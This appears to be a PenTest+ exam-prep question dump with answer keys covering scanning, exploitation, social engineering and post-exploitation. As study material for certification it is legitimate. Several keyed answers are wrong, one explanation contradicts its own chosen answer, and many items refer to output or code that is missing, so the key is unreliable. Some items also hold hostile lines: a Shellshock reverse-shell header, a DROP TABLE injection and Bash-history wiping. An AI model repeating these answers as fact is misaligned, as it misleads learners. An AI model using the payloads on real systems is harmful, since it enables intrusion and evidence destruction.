PenTest+
An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems. Which of the following is the penetration tester trying to accomplish? (A). Uncover potential criminal activity based on the evidence gathered. (B). Identify all the vulnerabilities in the environment. (C). Limit invasiveness based on scope. (D). Maintain confidentiality of the findings.
(C). Limit invasiveness based on scope.
A penetration tester gives the following command to a systems administrator to execute on one of the target servers: rm -f /var/www/html/G679h32gYu.php Which of the following BEST explains why the penetration tester wants this command executed? (A). To trick the systems administrator into installing a rootkit (B). To close down a reverse shell (C). To remove a web shell after the penetration test (D). To delete credentials the tester created
(C). To remove a web shell after the penetration test
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test. Which of the following describes the scope of the assessment? (A). Partially known environment testing (B). Known environment testing (C). Unknown environment testing (D). Physical environment testing
(C). Unknown environment testing
A compliance-based penetration test is primarily concerned with: (A). obtaining Pll from the protected network. (B). bypassing protection on edge devices. (C). determining the efficacy of a specific set of security standards. (D). obtaining specific information from the protected network.
(C). determining the efficacy of a specific set of security standards.
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine: ssh [email protected] -L5555:10.1.2.:25 Which of the following would be the BEST command to use for further progress into the targeted network? (A). nc 10.10.1.2 (B). ssh 10.10.1.2 (C). nc 127.0.0.1 5555 (D). ssh 127.0.0.1 5555
(C). nc 127.0.0.1 5555
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task? (A). nmap -f -sV -p80 192.168.1.20 (B). nmap -sS -sL -p80 192.168.1.20 (C). nmap -A -T4 -p80 192.168.1.20 (D). nmap -O -v -p80 192.168.1.20
(C). nmap -A -T4 -p80 192.168.1.20
A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity? (A). /var/log/messages (B). /var/log/last_user (C). /var/log/user_log (D). /var/log/lastlog
(D). /var/log/lastlog The /var/log/lastlog file is a log file that stores information about the last user to sign in to the server. This file stores information such as the username, IP address, and timestamp of the last user to sign in to the server. It can be used by a penetration tester to determine the identity of the last user who signed in to the web server, which can be helpful in identifying the user who may have set up the backdoors and other malicious activities.
Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine? (A). Wireshark (B). EAPHammer (C). Kismet (D). Aircrack-ng
(D). Aircrack-ng The BEST tool to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine is Aircrack-ng. Aircrack-ng is a suite of tools used to assess the security of wireless networks. It starts by capturing wireless network packets [1], then attempts to crack the network password by analyzing them [1].
A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts? (A). Tailgating (B). Dumpster diving (C). Shoulder surfing (D). Badge cloning
(D). Badge cloning
In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers. Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment? (A). Test for RFC-defined protocol conformance. (B). Attempt to brute force authentication to the service. (C). Perform a reverse DNS query and match to the service banner. (D). Check for an open relay configuration.
(D). Check for an open relay configuration. SMTP is a protocol associated with mail servers. Therefore, for a penetration tester, an open relay configuration can be exploited to launch phishing attacks.
Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience? (A). Executive summary of the penetration-testing methods used (B). Bill of materials including supplies, subcontracts, and costs incurred during assessment (C). Quantitative impact assessments given a successful software compromise (D). Code context for instances of unsafe type-casting operations
(D). Code context for instances of unsafe type-casting operations
A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results: Based on the output, which of the following services are MOST likely to be exploited? (Choose two.) A). Telnet (B). HTTP (C). SMTP (D). DNS (E). NTP (F). SNMP
(B). HTTP (D). DNS
A Chief Information Security Officer wants a penetration tester to evaluate the security awareness level of the company's employees. Which of the following tools can help the tester achieve this goal? (A). Metasploit (B). Hydra (C). SET (D). WPScan
(A). Metasploit
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command: nmap -O -A -sS -p- 100.100.100.50 Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan? (A). A firewall or IPS blocked the scan. (B). The penetration tester used unsupported flags. (C). The edge network device was disconnected. (D). The scan returned ICMP echo replies.
(A). A firewall or IPS blocked the scan.
Which of the following assessment methods is MOST likely to cause harm to an ICS environment? (A). Active scanning (B). Ping sweep (C). Protocol reversing (D). Packet analysis
(A). Active scanning
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report? (A). Add a dependency checker into the tool chain. (B). Perform routine static and dynamic analysis of committed code. (C). Validate API security settings before deployment. (D). Perform fuzz testing of compiled binaries.
(A). Add a dependency checker into the tool chain.
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions? (A). Aircrack-ng (B). Wireshark (C). Wifite (D). Kismet
(A). Aircrack-ng
A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig: comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org. 3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org. Which of the following potential issues can the penetration tester identify based on this output? (A). At least one of the records is out of scope. (B). There is a duplicate MX record. (C). The NS record is not within the appropriate domain. (D). The SOA records outside the comptia.org domain.
(A). At least one of the records is out of scope.
When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities? (A). Clarify the statement of work. (B). Obtain an asset inventory from the client. (C). Interview all stakeholders. (D). Identify all third parties involved.
(A). Clarify the statement of work.
A penetration tester writes the following script: Which of the following objectives is the tester attempting to achieve? (A). Determine active hosts on the network. (B). Set the TTL of ping packets for stealth. (C). Fill the ARP table of the networked devices. (D). Scan the system on the most used ports.
(A). Determine active hosts on the network.
Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools? (A). Dictionary (B). Directory (C). Symlink (D). Catalog (E). For-loop
(A). Dictionary
A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future? (A). Enforce mandatory employee vacations (B). Implement multifactor authentication (C). Install video surveillance equipment in the office (D). Encrypt passwords for bank account information
(A). Enforce mandatory employee vacations If the employee already works in the accounting department, MFA will not stop their actions because they'll already have access by virtue of their job.
A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation? (A). Implement a recurring cybersecurity awareness education program for all users. (B). Implement multifactor authentication on all corporate applications. (C). Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy. (D). Implement an email security gateway to block spam and malware from email communications.
(A). Implement a recurring cybersecurity awareness education program for all users.
User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database? (A). MD5 (B). bcrypt (C). SHA-1 (D). PBKDF2
(A). MD5
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports? (A). OpenVAS (B). Drozer (C). Burp Suite (D). OWASP ZAP
(A). OpenVAS OpenVAS is a full-featured vulnerability scanner. OWASP ZAP = Burp Suite Drozer (Android) = drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables? (A). SOW (B). SLA (C). MSA (D). NDA
(A). SOW
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) (A). Spawned shells (B). Created user accounts (C). Server logs (D). Administrator accounts (E). Reboot system (F). ARP cache
(A). Spawned shells (B). Created user accounts Removing shells: Remove any shell programs installed when performing the pentest. Removing tester-created credentials: created during the pentest. This includes backdoor accounts. Removing tools: Remove any software tools that were installed on the customer's systems that were used to aid in the exploitation of systems.
A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output? (A). The HTTP port is not open on the firewall. (B). The tester did not run sudo before the command. (C). The web server is using HTTPS instead of HTTP. (D). This URI returned a server error.
(A). The HTTP port is not open on the firewall.
A company provided the following network scope for a penetration test: 169.137.1.0/24 221.10.1.0/24 149.14.1.0/24 A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake? (A). The company that requested the penetration test (B). The penetration testing company (C). The target host's owner (D). The penetration tester (E). The subcontractor supporting the test
(A). The company that requested the penetration test
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.) (A). The libraries may be vulnerable (B). The licensing of software is ambiguous (C). The libraries' code bases could be read by anyone (D). The provenance of code is unknown (E). The libraries may be unsupported (F). The libraries may break the application
(A). The libraries may be vulnerable (C). The libraries' code bases could be read by anyone
A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client's data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester's decision? (A). The tester had the situational awareness to stop the transfer. (B). The tester found evidence of prior compromise within the data set. (C). The tester completed the assigned part of the assessment workflow. (D). The tester reached the end of the assessment time frame.
(A). The tester had the situational awareness to stop the transfer.
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? (A). Unsupported operating systems (B). Susceptibility to DDoS attacks (C). Inability to network (D). The existence of default passwords
(A). Unsupported operating systems
A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website? (A). WHOIS domain lookup (B). Job listing and recruitment ads (C). SSL certificate information (D). Public data breach dumps
(A). WHOIS domain lookup The BEST passive method of obtaining the technical contacts for the website would be a WHOIS domain lookup. WHOIS is a protocol that provides information about registered domain names, such as the registration date, registrant's name and contact information, and the name servers assigned to the domain. By performing a WHOIS lookup, the penetration tester can obtain the contact information of the website's technical staff, which can be used to craft a convincing phishing email.
Given the following output: User-agent:* Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ During which of the following activities was this output MOST likely obtained? (A). Website scraping (B). Website cloning (C). Domain enumeration (D). URL enumeration
(A). Website scraping
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type? (A). Windows (B). Apple (C). Linux (D). Android
(A). Windows
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? (A). chmod u+x script.sh (B). chmod u+e script.sh (C). chmod o+e script.sh (D). chmod o+x script.sh
(A). chmod u+x script.sh
A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory: U3VQZXIkM2NyZXQhCg== Which of the following commands should the tester use NEXT to decode the contents of the file? (A). echo U3VQZXIkM2NyZXQhCg== | base64 "d (B). tar zxvf password.txt (C). hydra "l svsacct "p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24 (D). john --wordlist /usr/share/seclists/rockyou.txt password.txt
(A). echo U3VQZXIkM2NyZXQhCg== | base64 "d
A penetration tester runs the following command on a system: find / -user root -perm -4000 -print 2>/dev/null Which of the following is the tester trying to accomplish? (A). Set the SGID on all files in the / directory (B). Find the /root directory on the system (C). Find files with the SUID bit set (D). Find files that were created during exploitation and move them to /dev/null
(C). Find files with the SUID bit set the 2>/dev/null is output redirection, it simply sends all the error messages to infinity and beyond preventing any error messages to appear in the terminal session.
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run? (A). exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"} (B). exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"} (C). exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} (D). exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
(A). exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
A penetration tester logs in as a user in the cloud environment of a company. Which of the following Pacu modules will enable the tester to determine the level of access of the existing user? (A). iam_enum_permissions (B). iam_privesc_scan (C). iam_backdoor_assume_role (D). iam_bruteforce_permissions
(A). iam_enum_permissions
A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully? (A). windows/x64/meterpreter/reverse_tcp (B). windows/x64/meterpreter/reverse_http (C). windows/x64/shell_reverse_tcp (D). windows/x64/powershell_reverse_tcp (E). windows/x64/meterpreter/reverse_https
(A). windows/x64/meterpreter/reverse_tcp A reverse tcp connection is usually used to bypass firewall restrictions on open ports. A firewall usually blocks incoming connections on open ports, but does not block outgoing traffic. windows/meterpreter/reverse_tcp allows you to remotely control the file system, sniff, keylog, hashdump, perform network pivoting, control the webcam and microphone, etc.
Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data? (A). An unknown-environment assessment (B). A known-environment assessment (C). A red-team assessment (D). A compliance-based assessment
(B). A known-environment assessment A known environment test is often more complete, because testers can get to every system, service, or other target that is in scope and will have credentials and other materials that will allow them to be tested.
A penetration tester has prepared the following phishing email for an upcoming penetration test: Which of the following is the penetration tester using MOST to influence phishing targets to click on the link? (A). Familiarity and likeness (B). Authority and urgency (C). Scarcity and fear (D). Social proof and greed
(B). Authority and urgency
A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information? (A). Badge cloning (B). Dumpster diving (C). Tailgating (D). Shoulder surfing
(B). Dumpster diving
A penetration tester conducted a vulnerability scan against a client's critical servers and found the following: Which of the following would be a recommendation for remediation? (A). Deploy a user training program (B). Implement a patch management plan (C). Utilize the secure software development life cycle (D). Configure access controls on each of the servers
(B). Implement a patch management plan
During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT? (A). Deny that the vulnerability existed (B). Investigate the penetration tester. (C). Accept that the client was right. (D). Fire the penetration tester.
(B). Investigate the penetration tester.
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following: Which of the following tools will help the tester prepare an attack for this scenario? (A). Hydra and crunch (B). Netcat and cURL (C). Burp Suite and DIRB (D). Nmap and OWASP ZAP
(B). Netcat and cURL
During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data? (A). Vulnerability scanning (B). Network segmentation (C). System hardening (D). Intrusion detection
(B). Network segmentation
Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.) (A). Use of non-optimized sort functions (B). Poor input sanitization (C). Null pointer dereferences (D). Non-compliance with code style guide (E). Use of deprecated Javadoc tags (F). A cydomatic complexity score of 3
(B). Poor input sanitization (C). Null pointer dereferences
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? A). Smurf (B). Ping flood (C). Fraggle (D). Ping of death
(C). Fraggle Fraggle attack is same as a Smurf attack but rather than ICMP, UDP protocol is used. The prevention of these attacks is almost identical to Fraggle attack.
The results of an Nmap scan are as follows: Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST Nmap scan report for ( 10.2.1.22 ) Host is up (0.0102s latency). Not shown: 998 filtered ports Port State Service 80/tcp open http |_http-title: 80F 22% RH 1009.1MB (text/html) |_http-slowloris-check: | VULNERABLE: | Slowloris DoS Attack | <..> Device type: bridge|general purpose Running (JUST GUESSING) : QEMU (95%) OS CPE: cpe:/a:qemu:qemu No exact OS matches found for host (test conditions non-ideal). OS detection performed. Please report any incorrect results at https://nmap.org/submit/. Nmap done: 1 IP address (1 host up) scanned in 107.45 seconds Which of the following device types will MOST likely have a similar response? (Choose two.) (A). Network device (B). Public-facing web server (C). Active Directory domain controller (D). IoT/embedded device (E). Exposed RDP (F). Print queue
(B). Public-facing web server (D). IoT/embedded device https://www.netscout.com/what-is-ddos/slowloris-attacks From the http-title in the output, this looks like an IoT device with RH implying Relative Humidity, that offers a web-based interface for visualizing the results.
A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly. Which of the following changes should the tester apply to make the script work as intended? Example script: #!/usr/bin/perl $ip=$argv[1]; attack($ip); sub attack { print("x"); } (A). Change line 2 to $ip= 10.192.168.254; (B). Remove lines 3, 5, and 6. (C). Remove line 6. (D). Move all the lines below line 7 to the top of the script.
(B). Remove lines 3, 5, and 6.
A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding? (A). Prohibiting exploitation in the production environment (B). Requiring all testers to review the scoping document carefully (C). Never assessing the production networks (D). Prohibiting testers from joining the team during the assessment
(B). Requiring all testers to review the scoping document carefully
A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider's metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited? (A). Cross-site request forgery (B). Server-side request forgery (C). Remote file inclusion (D). Local file inclusion
(B). Server-side request forgery
An Nmap scan of a network switch reveals the following: Which of the following technical controls will most likely be the FIRST recommendation for this device? (A). Encrypted passwords (B). System-hardening techniques (C). Multifactor authentication (D). Network segmentation
(B). System-hardening techniques
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred? (A). The SSL certificates were invalid. (B). The tester IP was blocked. (C). The scanner crashed the system. (D). The web page was not found.
(B). The tester IP was blocked.
A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following: python -c 'import pty; pty.spawn("/bin/bash")' Which of the following actions Is the penetration tester performing? (A). Privilege escalation (B). Upgrading the shell (C). Writing a script for persistence (D). Building a bind shell
(B). Upgrading the shell
A penetration tester obtained the following results after scanning a web server using the dirb utility: GENERATED WORDS: 4612 ---- Scanning URL: http://10.2.10.13/ ---- + http://10.2.10.13/about (CODE:200|SIZE:1520) + http://10.2.10.13/home.html (CODE:200|SIZE:214) + http://10.2.10.13/index.html (CODE:200|SIZE:214) + http://10.2.10.13/info (CODE:200|SIZE:214) ... DOWNLOADED: 4612 - FOUND: 4 Which of the following elements is MOST likely to contain useful information for the penetration (A). index.html (B). about (C). info (D). home.html
(B). about
A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following: IP Address: 192.168.1.63 Physical Address: 60-36-dd-a6-c5-33 Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully? (A). tcpdump -i eth01 arp and arp[6:2] == 2 (B). arp -s 192.168.1.63 60-36-DD-A6-C5-33 (C). ipconfig /all findstr /v 00-00-00 | findstr Physical (D). route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1
(B). arp -s 192.168.1.63 60-36-DD-A6-C5-33
An exploit developer is coding a script that submits a very large number of small requests to a web server until the server is compromised. The script must examine each response received and compare the data to a large number of strings to determine which data to submit next. Which of the following data structures should the exploit developer use to make the string comparison and determination as efficient as possible? (A). A list (B). A tree (C). A dictionary (D). An array
(C). A dictionary data structures are used to store data in an organized form, and some data structures are more efficient and suitable for certain operations than others. For example, hash tables, skip lists and jump lists are some dictionary data structures that can insert and access elements efficiently3. For string comparison, there are different algorithms that can measure how similar two strings are, such as Levenshtein distance, Hamming distance or Jaccard similarity4. Some of these algorithms can be implemented using data structures such as arrays or hashtables5.
A penetration tester gains access to a system and establishes persistence, and then runs the following commands: cat /dev/null > temp touch -r .bash_history temp mv temp .bash_history Which of the following actions is the tester MOST likely performing? (A). Redirecting Bash history to /dev/null (B). Making a copy of the user's Bash history for further enumeration (C). Covering tracks by clearing the Bash history (D). Making decoy files on the system to confuse incident responders
(C). Covering tracks by clearing the Bash history
A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive? (A). Nmap -s 445 -Pn -T5 172.21.0.0/16 (B). Nmap -p 445 -n -T4 -open 172.21.0.0/16 (C). Nmap -sV --script=smb* 172.21.0.0/16 (D). Nmap -p 445 -max -sT 172. 21.0.0/16
(C). Nmap -sV --script=smb* 172.21.0.0/16 The best option when stealth is not a concern and the task is time sensitive is to use the command: Nmap -sV --script=smb* 172.21.0.0/16. This command will use version detection and SMB scripts to scan for port 445 on the given IP range. The -sV option will cause Nmap to detect the version of services running on the ports, which is helpful for identifying vulnerabilities, and the --script=smb* option will cause Nmap to run all of the SMB related scripts. The -T4 option can be used to speed up the scan, as it increases the timing probes.
Given the following code: Which of the following are the BEST methods to prevent against this type of attack? (Choose two.) (A). Web-application firewall (B). Parameterized queries (C). Output encoding (D). Session tokens (E). Input validation (F). Base64 encoding
(C). Output encoding (E). Input validation Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
A penetration tester conducted an assessment on a web server. The logs from this session show the following: http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- Which of the following attacks is being attempted? (A). Clickjacking (B). Session hijacking (C). Parameter pollution (D). Cookie hijacking (E). Cross-site scripting
(C). Parameter pollution
A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement? (A). Prying the lock open on the records room (B). Climbing in an open window of the adjoining building (C). Presenting a false employee ID to the night guard (D). Obstructing the motion sensors in the hallway of the records room
(C). Presenting a false employee ID to the night guard "to be conducted after hours and should not include circumventing the alarm or performing destructive entry"
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance? (A). Wardriving (B). Shodan (C). Recon-ng (D). Aircrack-ng
(C). Recon-ng
A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company's privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server? (A). OpenVAS (B). Nikto (C). SQLmap (D). Nessus
(C). SQLmap
A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company's network. Which of the following accounts should the tester use to return the MOST results? (A). Root user (B). Local administrator (C). Service (D). Network administrator
(C). Service
A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities? (A). Comma (B). Double dash (C). Single quote (D). Semicolon
(C). Single quote
A penetration tester is looking for vulnerabilities within a company's web application that are in scope. The penetration tester discovers a login page and enters the following string in a field: 1;SELECT Username, Password FROM Users; Which of the following injection attacks is the penetration tester using? (A). Blind SQL (B). Boolean SQL (C). Stacked queries (D). Error-based
(C). Stacked queries
A penetration tester is testing a new API for the company's existing services and is preparing the following script: Which of the following would the test discover? (A). Default web configurations (B). Open web ports on a host (C). Supported HTTP methods (D). Listening web servers in a domain
(C). Supported HTTP methods
A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail? (A). The injection was too slow. (B). The DNS information was incorrect. (C). The DNS cache was not refreshed. (D). The client did not receive a trusted response.
(C). The DNS cache was not refreshed.
Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully? (A). The IP address is wrong. (B). The server is unreachable. (C). The IP address is on the blocklist. (D). The IP address is on the allow list.
(C). The IP address is on the blocklist. The most likely explanation for why a penetration tester cannot scan a server that was previously scanned successfully is that the IP address is on the blocklist. Blocklists are used to prevent malicious actors from scanning servers, and if the IP address of the server is on the blocklist, the scanning process will be blocked.
A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT? (A). The penetration tester conducts a retest. (B). The penetration tester deletes all scripts from the client machines. (C). The client applies patches to the systems. (D). The client clears system logs generated during the test.
(C). The client applies patches to the systems.
A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability. Which of the following should the penetration tester consider BEFORE running a scan? (A). The timing of the scan (B). The bandwidth limitations (C). The inventory of assets and versions (D). The type of scan
(C). The inventory of assets and versions
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following: Which of the following should the penetration tester do NEXT? (A). Close the reverse shell the tester is using. (B). Note this finding for inclusion in the final report. (C). Investigate the high numbered port connections. (D). Contact the client immediately.
(D). Contact the client immediately.
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website's response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester? (A). Situational awareness (B). Rescheduling (C). DDoS defense (D). Deconfliction
(D). Deconfliction Deconfliction is a process that provides a way to separate Red Team activity from real-world activity.
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information? (A). Create a custom password dictionary as preparation for password spray testing. (B). Recommend using a password manage/vault instead of text files to store passwords securely. (C). Recommend configuring password complexity rules in all the systems and applications. (D). Document the unprotected file repository as a finding in the penetration-testing report.
(D). Document the unprotected file repository as a finding in the penetration-testing report.
An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client's information? (A). Follow the established data retention and destruction process (B). Report any findings to regulatory oversight groups (C). Publish the findings after the client reviews the report (D). Encrypt and store any client information for future analysis
(D). Encrypt and store any client information for future analysis After completing an assessment and providing the report and evidence to the client, it is important to follow the established data retention and destruction process to ensure the confidentiality of the client's information. This process typically involves securely deleting or destroying any data collected during the assessment that is no longer needed, and securely storing any data that needs to be retained. This helps to prevent unauthorized access to the client's information and protects the client's confidentiality. Reporting any findings to regulatory oversight groups may be necessary in some cases, but it should be done only with the client's permission and in accordance with any relevant legal requirements. Publishing the findings before the client has reviewed the report is also not recommended, as it may breach the client's confidentiality and damage their reputation. Encrypting and storing client information for future analysis is also not recommended unless it is necessary and in compliance with any legal or ethical requirements.
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment. Which of the following actions should the tester take? (A). Perform forensic analysis to isolate the means of compromise and determine attribution. (B). Incorporate the newly identified method of compromise into the red team's approach. (C). Create a detailed document of findings before continuing with the assessment. (D). Halt the assessment and follow the reporting procedures as outlined in the contract.
(D). Halt the assessment and follow the reporting procedures as outlined in the contract.
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT? (A). Forensically acquire the backdoor Trojan and perform attribution (B). Utilize the backdoor in support of the engagement (C). Continue the engagement and include the backdoor finding in the final report (D). Inform the customer immediately about the backdoor
(D). Inform the customer immediately about the backdoor
The following line-numbered Python code snippet is being used in reconnaissance: Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS? (A). Line 01 (B). Line 02 (C). Line 07 (D). Line 08
(D). Line 08
